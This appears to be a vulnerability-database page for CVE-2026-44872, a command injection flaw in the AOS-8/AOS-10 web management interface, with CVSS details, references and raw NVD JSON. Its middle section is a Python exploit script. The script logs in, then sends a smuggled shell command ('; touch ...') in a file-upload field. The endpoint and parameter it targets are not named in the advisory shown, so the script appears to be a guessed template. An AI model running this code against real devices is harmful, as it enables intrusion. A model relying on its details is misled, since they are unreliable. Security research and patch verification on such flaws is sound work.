CVE-2026-44872

Description

A command injection vulnerability exists in the web-based management interface of AOS-8 and AOS-10 Operating Systems. Successful exploitation could allow an authenticated remote attacker to place arbitrary files on the underlying filesystem of the affected device.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AOS-8

AOS-10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# PoC for CVE-2026-44872: Command Injection in AOS-8/10
# Target: AOS-8 and AOS-10 Web Management Interface
# Requirement: Authenticated High Privileges

target_url = "https://<target-ip>/api/v1/file/upload"
session = requests.Session()

# 1. Login to get authenticated session (High Privilege required)
creds = {"username": "admin", "password": "password"}
session.post("https://<target-ip>/login", data=creds)

# 2. Prepare malicious payload to inject command
# The goal is to write a file to the underlying filesystem
payload = "; touch /tmp/poc_success.txt"

# 3. Send malicious request to vulnerable endpoint
data = {
    "filename": "config.txt",
    "content": payload  # Vulnerable parameter
}

response = session.post(target_url, data=data, verify=False)

if response.status_code == 200:
    print("[+] Payload sent successfully.")
    print("[+] Check if /tmp/poc_success.txt exists on the target.")
else:
    print("[-] Failed to send payload.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44872
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44872
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44872/
[4] VulDB https://vuldb.com/cve/CVE-2026-44872
[5] https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44872", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:45.793", "lastModified": "2026-05-12T20:16:45.793", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability exists in the web-based management interface of AOS-8 and AOS-10 Operating Systems. Successful exploitation could allow an authenticated remote attacker to place arbitrary files on the underlying filesystem of the affected device."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}